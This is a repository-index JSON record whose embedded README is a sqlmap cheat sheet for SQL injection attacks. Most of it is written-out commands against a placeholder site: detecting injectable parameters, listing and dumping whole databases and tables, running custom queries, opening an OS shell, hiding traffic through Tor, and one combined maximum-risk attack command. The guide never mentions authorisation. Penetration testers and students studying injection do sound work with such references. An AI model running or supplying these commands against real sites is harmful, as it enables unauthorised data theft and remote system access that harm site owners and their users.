{"id":18811268,"url":"https://github.com/mrmtwoj/sqlmap_help","last_synced_at":"2026-01-26T02:06:32.992Z","repository":{"id":186251731,"uuid":"460034609","full_name":"mrmtwoj/sqlmap_help","owner":"mrmtwoj","description":null,"archived":false,"fork":false,"pushed_at":"2022-02-16T14:30:32.000Z","size":8,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":2,"default_branch":"main","last_synced_at":"2024-12-29T23:54:17.453Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mrmtwoj.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2022-02-16T14:18:00.000Z","updated_at":"2022-02-16T14:18:00.000Z","dependencies_parsed_at":null,"dependency_job_id":"abc34970-4054-427f-b761-f63b2cc1dd2e","html_url":"https://github.com/mrmtwoj/sqlmap_help","commit_stats":null,"previous_names":["mrmtwoj/sqlmap_help"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mrmtwoj%2Fsqlmap_help","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mrmtwoj%2Fsqlmap_help/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mrmtwoj%2Fsqlmap_help/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mrmtwoj%2Fsqlmap_help/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mrmtwoj","download_url":"https://codeload.github.com/mrmtwoj/sqlmap_help/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":239748254,"owners_count":19690232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-07T23:25:23.048Z","updated_at":"2026-01-11T05:30:16.325Z","avatar_url":"https://github.com/mrmtwoj.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# SQLMAP HELP DESK \n## Simple Usage\nIf you don’t know anything about the target site then use the normal command first, Observe if the SQLMap found something juicy for you\n\n```bash\nsqlmap -u “https://target_site.com/page/”\n```\n\n## Automatic GET request parameter\n```bash\nsqlmap -u “https://target_site.com/page?p1=value1\u0026p2=value2”\n```\n## Specify the GET request parameters to Exploit\nYou can specify on which parameter you want to check or exploit the sql injection using just “-p” flag.\n```bash\nsqlmap -u “https://target_site.com/page?p1=value1\u0026p2=value2” -p p1\n```\n## Use POST requests (Test All parameters)\n```bash\nsqlmap -u “https://target_site.com/page/” --data=\"p1=value1\u0026p2=value2\"\n```\n## SQLMap Request file as input\nYou can specify a request file containing the HTTP request, You can get it quickly from BurpSuite.\n\n## sqlmap -r request.txt\nHere you can specify the targeted parameter or sqlmap will recognize and will test for all the parameters found.\n\n## Use Authenticated Session With Cookie\n```bash\nsqlmap -u “https://target_site.com/page/” --data=\"p1=value1\u0026p2=value2\" --cookie=\"Session_Cookie_Value\"\n```\n## Use Authenticated Session with Auth Headers\n```bash\nsqlmap -u “https://target_site.com/page/” --data=\"p1=value1\u0026p2=value2\" --headers=\"Authorization: Basic YWxhZGRpbjpvcGVuc2VzYW1l\"\n```\n## Basic Authentication\n```bash\nsqlmap -u “https://target_site.com/page/” --data=\"p1=value1\u0026p2=value2\" --auth-type=basic --auth-cred=username:password\n```\n## Use Previously created Session as SQLmap input (-s)\nIf you got SQL injection positive somewhere, then sqlmap will automatically create a session file(.sqlite) for later use. Now, If you want to try some other commands later, you can use the session file directly (It will save your time to re-try all the possible payloads and identify the vulnerability and all.)\n```bash\nsqlmap -u “https://target_site.com/page?p1=value1\" -s SESSION-FILE.sqlite --dbs\n```\nYou can use this file from the home path of the SQLMap tool’s output directory.\n\n## Post Exploitation Commands\nIf the SQL injection vulnerability is observed positive then you can use the following commands to Exploit the SQL injection vulnerability.\n\n## List the Databases\n```bash\nsqlmap -u “https://target_site.com/page?p1=value1” --dbs\n```\n## List Tables of Database TARGET_DB\n```bash\nsqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB --tables\n```\n## List Columns of Table TARGET_TABLE of Database TARGET_DB\n```bash\nsqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB -T TARGET_TABLE --columns\n```\n## Dump Specific Data of Columns of Table TARGET_TABLE of Database TARGET_DB\n```bash\nsqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB -T TARGET_TABLE -C \"Col1,Col2\" --dump\n```\n## Fully Dump Table TARGET_TABLE of Database TARGET_DB\n```bash\nsqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB -T TARGET_TABLE --dump\n```\n## Dump full Database\n```bash\nsqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB --dump\n```\n##Custom SQL query\n```bash\nsqlmap -u “https://target_site.com/page?p1=value1” --sql-query \"SELECT * FROM TARGET_DB;\"\n```\n## Get OS Shell\n```bash\nsqlmap -u “https://target_site.com/page?p1=value1” --os-shell\n```\n##Get SQL shell\n```bash\nsqlmap -u “https://target_site.com/page?p1=value1” --sqlmap-shell\n```\n\n# SQLMap Proxy\n## Proxy through Burpsuite\n```bash\nsqlmap -u “https://target_site.com/page?p1=value1” --proxy=\"http://127.0.0.1:8080/\"\n```\n## Use Tor Socks5 proxy\n```bash\nsqlmap -u “https://target_site.com/page?p1=value1” --tor --tor-type=SOCKS5 --check-tor --dbs\n```\n\n# Extra\n## Specify The Database Type\n```bash\nsqlmap -u “https://target_site.com/page?p1=value1” --dbms=mysql\n```\nYou can use other DBMS types like MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, Percona, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Amazon Redshift, Vertica, Mckoi, Presto, Altibase, MimerSQL, CrateDB, Greenplum, Drizzle, Apache Ignite, Cubrid, InterSystems Cache, IRIS, eXtremeDB, FrontBase, etc.\n\n# Attack Techniques\n–technique Specify a letter or letters of BEUSTQ to control the exploit attempts:\n\n* B: Boolean-based blind\n* E: Error-based\n* U: Union query-based\n* S: Stacked queries\n* T: Time-based blind\n* Q: Inline queries\n```bash\nsqlmap -u “https://target_site.com/page?p1=value1” --technique=BEUSTQ\n```\n## Specify the Injection Techniques\nYou can specify the difficulty levels using two flags,\n```bash\n–level = LEVEL     Level of tests to perform (1-5, default 1)\n–risk=RISK         Risk of tests to perform (0-3, default 1)\nsqlmap -u “https://target_site.com/page?p1=value1” --risk=3 --level=5\nOption: --risk\n```\nThis option requires an argument that specifies the risk of tests to perform. There are three risk values.\n\n```bash\n–riks=1: 1 is the default value which is for the majority of SQL injection points.\n\n–riks=2: Adds to the default level the tests for heavy query time-based SQL injections\n\n–riks=3: Value 3 adds also OR-based SQL injection tests.\n\nOption: --level\n```\nWhen the value of --level is \u003e= 2 it tests also HTTP Cookie header values. When this value is \u003e= 3 it tests also HTTP User-Agent and HTTP Referer header value for SQL injections.\n\nUse Default Options for the process\nUse –batch flag to use all the default options or used for non-interactive sessions. (By specifying –batch flag, sqlmap will not ask you for the (Y/N) choice rather then it will smartly choose according to the needs.)\n```bash\nsqlmap -u “https://target_site.com/page?p1=value1” --batch\n–force-ssl flag\n```\nForce SQLmap to use SSL or TLS for its requests.\n\n# Conclusion:\nSQLMap is a fantastic tool for SQL Injection attacks. By analyzing the above cheat sheet we can create a general-purpose command to use most useful flags in it,\n```bash\nsqlmap -u “https://target_site.com/page/”--proxy=\"http://127.0.0.1:8080/\" --cookie=”SESSID=lred0jr6na1vmci;” --data=”p1=value1” -p p1 --level=5 --risk=3 --dbms=mysql --technique=BEUSTQ --force-ssl\n```\nAs always I hope you found this SQLMap cheat sheet useful. Guys, feel free to show the post some love and share the cheat sheet to your friends and colleagues. I will also post in a detailed SQLMap tutorial soon.\n\n# References\n* http://sqlmap.org/\n* https://tools.kali.org/vulnerability-analysis/sqlmap\n* https://gitlab.com/kalilinux/packages/sqlmap\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmrmtwoj%2Fsqlmap_help","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmrmtwoj%2Fsqlmap_help","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmrmtwoj%2Fsqlmap_help/lists"}